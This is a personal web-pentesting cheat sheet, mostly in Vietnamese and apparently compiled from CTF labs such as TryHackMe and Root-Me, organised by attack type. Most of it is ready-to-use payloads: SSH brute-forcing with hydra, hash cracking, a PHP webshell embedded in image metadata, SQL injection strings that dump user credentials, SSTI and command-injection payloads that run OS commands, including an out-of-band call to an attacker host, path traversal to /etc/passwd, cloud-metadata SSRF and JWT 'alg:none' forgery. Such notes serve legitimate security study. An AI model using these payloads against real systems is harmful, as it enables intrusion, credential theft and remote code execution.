	[+] Leo_root:
	- https://gtfobins.github.io/
	- sudo cmd
	- as + /root/root.txt
=======================================

[+] Tools:
	- enum4linux -a <MACHINE IP>: kiếm username
	- hydra -t 4 -l <username> -P <rockyou.txt directory> ssh://<MACHINE IP>: Kiếm password

=======================================

[+] CHECK_FRAMEWORK:
	- kali@kali$ curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum
	- https://wiki.owasp.org/index.php/OWASP_favicon_database

[+] OSINT: 
	- nmap -T4 -sC -sV -p[start]-[stop] [ip]
	
	- site		site:tryhackme.com	returns results only from the specified website address
	- inurl		inurl:admin		returns results that have the specified word in the URL
	- filetype	filetype:pdf		returns results which are a particular file extension
	- intitle	intitle:admin		returns results that contain the specified word in the title

	
	- find / -type f -name user.txt 2>dev/null
	- find / -type f -perm /4000 2>dev/null

	- gobuster dir --url https://10-10-203-33.p.thmlabs.com/ -w /home/kali/Desktop/SecLists-master/Discovery/Web-Content/common.txt
	
	- └─$ hashcat -O -a 0 -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlist/rockyou.txt
				+) 10 | md5($pass.$salt)
     				+) 20 | md5($salt.$pass)
=======================================

[+] HIDDEN_DATA:
	- phương thức http:
		+ GET: Sử dụng để yêu cầu dữ liệu từ máy chủ. Thường được sử dụng để truy vấn thông tin.
		+ POST: Sử dụng để gửi dữ liệu đến máy chủ để xử lý. Thường được sử dụng trong việc gửi dữ liệu biểu mẫu.
		+ PUT: Sử dụng để cập nhật dữ liệu trên máy chủ hoặc tạo mới nếu nó không tồn tại.
		+ DELETE: Sử dụng để xóa dữ liệu trên máy chủ.
		+ PATCH: Sử dụng để cập nhật một phần của dữ liệu trên máy chủ. Thường được sử dụng để cập nhật một phần của tài liệu thay vì toàn bộ tài liệu.
		+ HEAD: Tương tự như GET, nhưng chỉ yêu cầu thông tin tiêu đề mà không yêu cầu dữ liệu thực tế.
		+ OPTIONS: Sử dụng để lấy thông tin về các phương thức được hỗ trợ bởi máy chủ hoặc tài nguyên cụ thể.
		+ CONNECT: Thường được sử dụng khi thiết lập một kết nối mạng riêng tư (VPN) qua máy chủ trung gian.
		+ TRACE: Sử dụng để lấy một bản sao của địa chỉ URL và tiêu đề yêu cầu để kiểm tra các tương tác trung gian giữa máy khách và máy chủ.
		+ OPTIONS: Sử dụng để yêu cầu máy chủ cung cấp danh sách các phương thức HTTP mà nó hỗ trợ cho một tài nguyên cụ thể. Đây là một số phương thức HTTP cơ bản, nhưng còn có các phương thức mở rộng và tùy chỉnh khác được sử dụng trong các ứng dụng và giao thức riêng biệt.

	- Breakpoint
	- Network
	- /.git
	- /robots.txt
	- /sitemap.xml
	- /admin
	- /backup
=======================================

[+] Reverse_Shell:
	- https://book.hacktricks.xyz/pentesting-web/file-upload
	- Content-Type: image/jpeg, png,...
	- └─$ exiftool -DocumentName="<?php system(‘ls’); __halt_compiler(); ?>" hehe.jpg
	- đổi tên file thành .php hoặc .php.jpg

=======================================

[+] SQL-injection:
	- 0 UNION SELECT 1,2,database()
	- 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'
	- 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'
	- 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

	- 0 UNION SELECT null,null,null,null,notes FROM people WHERE id = 1--
	- ' UNION SELECT SLEEP(0.2),null FROM users WHERE username='admin' AND length(password)>1#
	- limit 1,1
	-;SELECT+CASE+WHEN+SUBSTR((SELECT+table_name+FROM+information_schema.tables+limit+1),1,1)=chr(13)+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END--

[+] SQL_MAP:
	- https://github.com/RomaniukVadim/wargaming-challenges/blob/master/RootMe/web-server/sql_injection-time_based.txt
	- $ sqlmap -u "http://challenge01.root-me.org/web-serveur/ch40/?action=member&member=1" --tables --proxy "http://127.0.0.1:8080"

=======================================

[+] XSS:
	- innerHTML: Chèn giá trị trực tiếp vào code web
	- h2:contains(): có thể inject xss
	- javascript:alert(1) -> xss link
	- 	

=======================================

[+] Authentication:

	- X-Forwarded-For: <client>, <proxy1>, <proxy2> 
	+ Header "X-Forwarded-For" là một phần của giao thức HTTP mà khi gửi một yêu cầu từ một máy tính đến một máy chủ web thông qua các máy chủ trung gian, nó giúp xác định địa chỉ IP của các máy tính trung gian đó. Điều này quan trọng trong việc theo dõi quá trình truyền tải yêu cầu qua các máy chủ ấy.
	+ <client>: The client IP address
	+ <proxy1>, <proxy2>: If a request goes through multiple proxies, the IP addresses of each successive proxy is listed. This means that, given well-behaved client and proxies, the rightmost IP address is the IP address of the most recent proxy and the leftmost IP address is the IP address of the originating client.

	- X-Forwarded-Host: attacker.link: Sử dụng để máy chủ có thể biết máy khách muốn giao tiếp với ai
	

	- int overflow
	- log -> token
	- number < 0
=======================================

[+] Path traversal:
	- filename=../../../etc/passwd%00.png
	- ....//....//....//....//


=======================================

[+] Logic Vulnerabilities:
	- Int overflow
	- Xóa trường mật khẩu cũ
	- bof email

=======================================

[+] SSTI:
	- {%import+os;os.system('ls')%}					# python	
	- ${"freemarker.template.utility.Execute"?new()("id")} 		# java
	- Handlebars: when an error show in output			# handlebars

=======================================

[+] Command Injection:
	- & ping -c 10 127.0.0.1 &
	- & whoami > /var/www/static/whoami.txt &
	- & nslookup kgji2ohoyw.web-attacker.com &
	- & - && - | - ||

=======================================

[+] LFI:
	- local file include - include file để dùng làm mẫu cho trang web
	- ../../../etc/passwd%00.png
	
[+] RFI:
	- Sử dụng link raw github (https://www.4rth4s.xyz/2019/09/write-up-remote-file-inclusion-root-me.html)

=======================================

[+] SSRF - Sever-Side Request Forgery:
	- Khi 1 tham số chứa đẩy đủ 1 url 
	
	- end with: &x= (bỏ phần sau)
	-169.254.169.254 contain data in cloud environment

=======================================

[+] JWT:
	- decode() thay vì verify()
	- "alg":"none" (không hash bằng thuật toán nào cả) -> xóa signature nhưng để lại dấu . 